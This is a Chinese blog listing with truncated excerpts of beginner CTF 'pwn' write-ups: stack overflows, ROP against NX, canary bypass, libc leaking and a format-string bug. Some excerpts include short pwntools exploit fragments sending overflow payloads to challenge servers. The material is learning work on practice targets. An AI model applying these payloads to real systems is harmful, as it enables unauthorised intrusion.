- 博客(10)
- 收藏
- 关注
RSS订阅原创 10.自己动手研究动态链接库和静态链接库的区别
在学习注入dll时候 一直不理解如何区分动态链接库和静态链接库今天让我们自己写程序将它理解清楚首先我们打开vs创建一个动态链接库文件下面就是创建完文件之后 生成的代码我们在动态链接库的入口处写入自己的函数自己动手写一个dll导出函数#include "pch.h"// _declspec(dllexport) 声明导出函数将该函数从该dll开放提供给其他函数使用 extern "C" _declspec(dllexport) void ccc();void ccc() { Mes
2020-05-25 23:22:36
447
原创 9.pwn入门新手练习攻防世界stack2 低位读取内存
参考文章https://blog.csdn.net/qq_43681242/article/details/104077461exp#!/usr/bin/env python#coding:utf-8from pwn import *#p = process('./stack2')p = remote('111.198.29.45',58596)system_addr = 0x...
2020-02-22 10:19:04
1398
原创 8.pwn入门新手学堆详细笔记
这几天打算跟着wiki学习 就自己练习了一下 然后写到自己的csdn重复的记 哎 菜鸡的求生之路题目网址rop简介很多程序开了nx保护,所以我们要通过rop主要思想是在栈缓冲区的基础上 利用程序中已有的gadgets来改变某些寄存器或者变量的值,从而控制程序的执行流程gadgets就是 以ret结尾的指令序列,通过这些指令序列 我们可以修改某些地址的内容,方便控制程序的之执行流程ro...
2020-02-21 09:01:50
915
原创 7.pwn入门新手练习NX 栈不可执行的绕过方式--ROP链
文件地址提取码5o0a我们先看看它开了那些保护 看到了 只开了nx漏洞很明显可以看到 buf 这个字符串数组只有0x80的大小,但是却可以 read 0x200 个字节多出来的 0x200-0x80 就会造成溢出32位程序默认调用函数的方式为先将参数压入栈中,靠近call指令的是第一个参数而64位程序默认调用函数的方式则不同RDI 中存放第1个参数RSI 中存放第2个参数RD...
2020-02-18 15:09:53
1013
1
原创 6.pwn入门新手做攻防世界 forgot栈内变量溢出
可以看到这有两个交互 ok 开始写 expfrom pwn import*q=remote('111.198.29.45',50004)sysaddr=0x080486ccpayload=32*'A'+p32(sysaddr)q.recvuntil("What is your name?")q.sendline('suibian')q.recvuntil("Enter the s...
2020-02-18 09:56:30
322
原创 5.pwn入门新手 简单练习gdb调试
#gdb命令(1)frame n: 查看第n桢的信息, frame可以用f缩写(2)frame addr: 查看pc地址为addr的桢的相关信息(3)up n: 查看当前桢上面第n桢的信息(4)down n: 查看当前桢下面第n桢的信息https://blog.csdn.net/wang_xya/article/details/46011019 这位大佬的命令更为详细#include...
2020-02-17 17:11:14
1739
原创 4.pwn入门新手做攻防世界Mary_Morton (stack canary与绕过的思路)
canary通常栈溢出的利用方式是通过溢出存在于栈上的局部变量,从而让多出来的数据覆盖ebp、eip等,从而达到劫持控制流的目的。然而stack canary这一技术的应用使得这种利用手段变得难以实现。。这个概念应用在栈保护上则是在初始化一个栈帧时在栈底设置一个随机的canary值,栈帧销毁前测试比较该值是否“死掉”,即是否被改变,若被改变则说明栈溢出发生,程序走另一个流程结束,以免漏洞利...
2020-02-14 16:27:11
602
原创 3.pwn入门新手做无system泄露libc.so版本攻防世界pwn100 pwn200(dynelf 、libsearcher与got表plt表解)
第一步:基地址 = 实际地址(泄露的got地址) – libc中对应函数的偏移第二部:目的函数地址 = 基地址 + libc中对应函数的偏移Dynelf查找函数地址的典型方法是从泄漏的同一个库中的另一个函数的地址计算到所需函数的偏移量,然而,要使这种方法有效地工作,gLibc的远程服务器版本需要与我们的相同。我们还可以通过泄漏一些函数并在libcdb.com中搜索找到gLibc的远程版本,但...
2020-02-12 12:14:48
1992
原创 2. pwn入门新手做system没有参数(内含函数调用过程),需要自己构造的攻防世界cgpwn2,求大佬指教
我们拿到文件之后放到 linux里checksec一下 一个32位文件 ,开了nx 把文件拖入 ida f5开始分析main 函数 我们看到了hello() 函数 点进去 进行分析我们看到了比较重要的几行交互代码,,我们看看下面的部分首先要求我们输入一个名字,这个输入是通过fgets函数完成的,从键盘读取最多32h个字符到name区域我上网百度了一下 fgets的函数原型我们双击f...
2020-02-07 17:50:26
1934
原创 1.pwn入门新手看完别人写的wp,然后自己写,攻防世界CGfsb格式化字符串漏洞
我们拿到一个文件,扔到linux终端里checksec一下我们可以看到这是一个开nx了的32位的文件,我们打开x86ida,按f5查看伪代码,可以看到 这个当pwnme=8的时候 flag 就出来了我们发现 他的上面有一个printf(const char*)v8 正常的应该是printf(’%s",s), 我们当然可以这样写,但是这样是危险的,会有一定的概率导致 格式化字符串漏洞,0x4...
2020-02-06 17:54:19
1702
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人